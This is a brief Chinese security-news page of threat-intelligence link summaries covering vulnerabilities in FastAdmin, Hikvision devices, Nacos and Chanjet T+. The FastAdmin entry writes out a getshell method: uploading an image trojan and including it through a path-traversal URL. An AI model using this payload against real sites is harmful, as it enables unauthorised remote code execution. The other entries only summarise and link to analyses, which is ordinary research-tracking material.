Quan


WEB安全 内网安全 终端对抗 威胁情报
威胁情报
fastadmin前台getshell漏洞

Windows下可用,Linux下不太行。原理就是因为Windows那倒了血霉的路径斜杠问题。
总结:上传图片马,然后该路径包含
http://www.demo.com/index.php/index/user/_empty?name=../../public/uploads/xxxxx/xxxxx.jpg


https://mp.weixin.qq.com/s/02OFRMQH1nwFIP1dSQC9gg
威胁情报
海康威视八大漏洞利用方式

本文从海康威视的默认密码开始,介绍了常见的几个海康威视的洞


https://mp.weixin.qq.com/s/ZaZetpwisGxF9s_DLmzoGA
威胁情报
nacos-hessian-rce

给出了分析,并给出了payload该怎么构建,还没有研究。


https://t.zsxq.com/0fsa9R4ZX
威胁情报
畅捷通T+前台远程命令执行漏洞

部分利用点被打码,感觉需要自己挖掘一下


https://t.zsxq.com/0fHActVhe